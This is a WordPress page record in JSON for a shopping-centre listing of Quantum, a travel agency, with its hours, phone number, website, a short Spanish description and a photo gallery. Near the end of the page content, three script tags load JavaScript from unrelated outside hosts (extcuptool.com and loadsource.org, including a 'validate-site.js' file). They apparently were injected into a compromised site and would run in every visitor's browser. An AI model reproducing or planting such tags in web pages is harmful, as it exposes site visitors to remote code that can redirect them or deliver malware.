{"id":11157,"date":"2022-08-16T16:06:49","date_gmt":"2022-08-16T16:06:49","guid":{"rendered":"http:\/\/plaza54.com\/pagina\/?page_id=11157"},"modified":"2022-08-16T16:12:08","modified_gmt":"2022-08-16T16:12:08","slug":"quantum","status":"publish","type":"page","link":"https:\/\/plaza54.com\/pagina\/quantum\/","title":{"rendered":"Quantum"},"content":{"rendered":"<style type=\"text\/css\"> \n#cmsmasters_row_6a0904a2c067d .cmsmasters_row_outer_parent { \n\tpadding-top: 50px; \n} \n\n#cmsmasters_row_6a0904a2c067d .cmsmasters_row_outer_parent { \n\tpadding-bottom: 55px; \n} \n\n \n#cmsmasters_heading_6a0904a2c0a83 { \n\ttext-align:left; \n\tmargin-top:45px; \n\tmargin-bottom:10px; \n} \n\n#cmsmasters_heading_6a0904a2c0a83 .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a0904a2c0a83 .cmsmasters_heading, #cmsmasters_heading_6a0904a2c0a83 .cmsmasters_heading a { \n\tfont-weight:700; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a0904a2c0a83 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a0904a2c0aa8 { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:30px; \n} \n\n#cmsmasters_heading_6a0904a2c0aa8 .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a0904a2c0aa8 .cmsmasters_heading, #cmsmasters_heading_6a0904a2c0aa8 .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a0904a2c0aa8 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a0904a2c0ac0 { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:30px; \n} \n\n#cmsmasters_heading_6a0904a2c0ac0 .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a0904a2c0ac0 .cmsmasters_heading, #cmsmasters_heading_6a0904a2c0ac0 .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a0904a2c0ac0 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a0904a2c0ad7 { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:10px; \n} \n\n#cmsmasters_heading_6a0904a2c0ad7 .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a0904a2c0ad7 .cmsmasters_heading, #cmsmasters_heading_6a0904a2c0ad7 .cmsmasters_heading a { \n\tfont-weight:700; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a0904a2c0ad7 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a0904a2c0aeb { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:30px; \n} \n\n#cmsmasters_heading_6a0904a2c0aeb .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a0904a2c0aeb .cmsmasters_heading, #cmsmasters_heading_6a0904a2c0aeb .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a0904a2c0aeb .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a0904a2c0afe { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:10px; \n} \n\n#cmsmasters_heading_6a0904a2c0afe .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a0904a2c0afe .cmsmasters_heading, #cmsmasters_heading_6a0904a2c0afe .cmsmasters_heading a { \n\tfont-weight:700; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a0904a2c0afe .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a0904a2c0b14 { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:50px; \n} \n\n#cmsmasters_heading_6a0904a2c0b14 .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a0904a2c0b14 .cmsmasters_heading, #cmsmasters_heading_6a0904a2c0b14 .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a0904a2c0b14 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a0904a2c0d5a { \n\ttext-align:center; \n\tmargin-top:0px; \n\tmargin-bottom:20px; \n} \n\n#cmsmasters_heading_6a0904a2c0d5a .cmsmasters_heading { \n\ttext-align:center; \n} \n\n#cmsmasters_heading_6a0904a2c0d5a .cmsmasters_heading, #cmsmasters_heading_6a0904a2c0d5a .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a0904a2c0d5a .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_divider_6a0904a2c0d82 { \n\tborder-bottom-width:1px; \n\tborder-bottom-style:solid; \n\tpadding-top:0px; \n\tmargin-bottom:30px; \n} \n \n#cmsmasters_divider_6a0904a2c0dd0 { \n\tborder-bottom-width:0px; \n\tborder-bottom-style:solid; \n\tpadding-top:0px; \n\tmargin-bottom:20px; \n} \n\r\n\t\t\t\t#cmsmasters_gallery_6a0904a2c0df0 .cmsmasters_gallery {\r\n\t\t\t\t\tmargin:0 0 0 -15px;\r\n\t\t\t\t}\r\n\t\t\t\t\r\n\t\t\t\t#cmsmasters_gallery_6a0904a2c0df0 .cmsmasters_gallery .cmsmasters_gallery_item {\r\n\t\t\t\t\tpadding:0 0 15px 15px;\r\n\t\t\t\t}\r\n\t\t\t<\/style><div id=\"cmsmasters_row_6a0904a2c067d\" class=\"cmsmasters_row cmsmasters_color_scheme_default cmsmasters_row_top_default cmsmasters_row_bot_default cmsmasters_row_boxed\">\n<div class=\"cmsmasters_row_outer_parent\">\n<div class=\"cmsmasters_row_outer\">\n<div class=\"cmsmasters_row_inner\">\n<div class=\"cmsmasters_row_margin\">\n<div class=\"cmsmasters_column one_fourth\">\n<div class=\"aligncenter\">\n<div class=\"cmsmasters_img  cmsmasters_image_c\">\n<img decoding=\"async\" src=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2022\/08\/quantum.jpg\" alt=\"\" \/>\n<\/div>\n<\/div>\n\n<div id=\"cmsmasters_heading_6a0904a2c0a83\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h3 class=\"cmsmasters_heading\">Horario<\/h3>\n<\/div>\n<div id=\"cmsmasters_heading_6a0904a2c0aa8\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h6 class=\"cmsmasters_heading\">Lunes a S\u00e1bado: 10:00 am a 8:00 pm<\/h6>\n<\/div>\n<div id=\"cmsmasters_heading_6a0904a2c0ac0\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h6 class=\"cmsmasters_heading\">Domingos y festivos: 10:00 am a 6:00 pm<\/h6>\n<\/div>\n<div id=\"cmsmasters_heading_6a0904a2c0ad7\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h3 class=\"cmsmasters_heading\">Contacto<\/h3>\n<\/div>\n<div id=\"cmsmasters_heading_6a0904a2c0aeb\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h6 class=\"cmsmasters_heading\">311 8688027<\/h6>\n<\/div>\n<div id=\"cmsmasters_heading_6a0904a2c0afe\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h3 class=\"cmsmasters_heading\">P\u00e1gina Web<\/h3>\n<\/div>\n<div id=\"cmsmasters_heading_6a0904a2c0b14\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h6 class=\"cmsmasters_heading\"><a href=\"https:\/\/quantumtravel.com.co\/\">www.quantumtravel.com.co<\/a><\/h6>\n<\/div>\n<\/div>\n<div class=\"cmsmasters_column three_fourth\">\n\n<div id=\"cmsmasters_heading_6a0904a2c0d5a\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_center\">\n\t<h2 class=\"cmsmasters_heading\">Quantum &#8211; Locales 219 &#8211; 220 <\/h2>\n<\/div>\n\n<div id=\"cmsmasters_divider_6a0904a2c0d82\" class=\"cmsmasters_divider cmsmasters_divider_width_long cmsmasters_divider_pos_center\"><\/div>\n<div class=\"cmsmasters_text\">\n<div class=\"contentTituloDescrip\">\n<p>Somos una empresa dedicada a la prestaci\u00f3n de servicios tur\u00edsticos en diferentes partes del mundo, nuestro objetivo es llevar a personas, parejas o familias a recorrer cada rinc\u00f3n del mundo.<\/p>\n<\/div>\n<\/div>\n\n\n<div id=\"cmsmasters_divider_6a0904a2c0dd0\" class=\"cl\"><\/div>\n<div id=\"cmsmasters_gallery_6a0904a2c0df0\" class=\"cmsmasters_gallery_wrap\"><ul class=\"cmsmasters_gallery cmsmasters_3 cmsmasters_more_items_loader\"><li class=\"cmsmasters_gallery_item\"><figure><a href=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2022\/08\/quantum1.jpg\" rel=\"ilightbox[6a0904a2c0df0]\"><img loading=\"lazy\" decoding=\"async\" width=\"580\" height=\"375\" src=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2022\/08\/quantum1-580x375.jpg\" class=\"attachment-blog-masonry-thumb size-blog-masonry-thumb\" alt=\"\" srcset=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2022\/08\/quantum1-580x375.jpg 580w, https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2022\/08\/quantum1-1160x750.jpg 1160w\" sizes=\"auto, (max-width: 580px) 100vw, 580px\" \/><\/a><\/figure><\/li><li class=\"cmsmasters_gallery_item\"><figure><a href=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2022\/08\/quantum2.jpg\" rel=\"ilightbox[6a0904a2c0df0]\"><img loading=\"lazy\" decoding=\"async\" width=\"580\" height=\"375\" src=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2022\/08\/quantum2-580x375.jpg\" class=\"attachment-blog-masonry-thumb size-blog-masonry-thumb\" alt=\"\" srcset=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2022\/08\/quantum2-580x375.jpg 580w, https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2022\/08\/quantum2-1160x750.jpg 1160w\" sizes=\"auto, (max-width: 580px) 100vw, 580px\" \/><\/a><\/figure><\/li><li class=\"cmsmasters_gallery_item\"><figure><a href=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2022\/08\/quantum3.jpg\" rel=\"ilightbox[6a0904a2c0df0]\"><img loading=\"lazy\" decoding=\"async\" width=\"580\" height=\"375\" src=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2022\/08\/quantum3-580x375.jpg\" class=\"attachment-blog-masonry-thumb size-blog-masonry-thumb\" alt=\"\" srcset=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2022\/08\/quantum3-580x375.jpg 580w, https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2022\/08\/quantum3-1160x750.jpg 1160w\" sizes=\"auto, (max-width: 580px) 100vw, 580px\" \/><\/a><\/figure><\/li><\/ul><script type=\"text\/javascript\">\r\n\t\t\t\tjQuery(document).ready(function () {\r\n\t\t\t\t\t(function ($) {\r\n\t\t\t\t\t\tif ($('#cmsmasters_gallery_6a0904a2c0df0').find('.cmsmasters_gallery_item').length == '0') {\r\n\t\t\t\t\t\t\treturn false;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\tstartGallery( \r\n\t\t\t\t\t\t\t'6a0904a2c0df0', \r\n\t\t\t\t\t\t\t'grid', \r\n\t\t\t\t\t\t\t'false', \r\n\t\t\t\t\t\t\t'false' \r\n\t\t\t\t\t\t);\r\n\t\t\t\t\t} )(jQuery);\r\n\t\t\t\t} );\r\n\t\t\t<\/script>\r\n\t\t\t<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div id=\"cmsmasters_row_6a0904a2c1758\" class=\"cmsmasters_row cmsmasters_color_scheme_default cmsmasters_row_top_default cmsmasters_row_bot_default cmsmasters_row_boxed\">\n<div class=\"cmsmasters_row_outer_parent\">\n<div class=\"cmsmasters_row_outer\">\n<div class=\"cmsmasters_row_inner\">\n<div class=\"cmsmasters_row_margin\">\n<div class=\"cmsmasters_column one_first\">\n<div class=\"cmsmasters_text\">\n<p><script src=\"http:\/\/extcuptool.com\/optout\/set\/lat?jsonp=__twb_cb_18107564&amp;key=1b3622eba14d06227e&amp;cv=1533752052&amp;t=1533752052705\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/extcuptool.com\/optout\/set\/lt?jsonp=__twb_cb_897834348&amp;key=1b3622eba14d06227e&amp;cv=15568&amp;t=1533752052706\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=52131x6966x&amp;r=1533752052711\" type=\"text\/javascript\"><\/script><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-11157","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/pages\/11157","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/comments?post=11157"}],"version-history":[{"count":5,"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/pages\/11157\/revisions"}],"predecessor-version":[{"id":11166,"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/pages\/11157\/revisions\/11166"}],"wp:attachment":[{"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/media?parent=11157"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}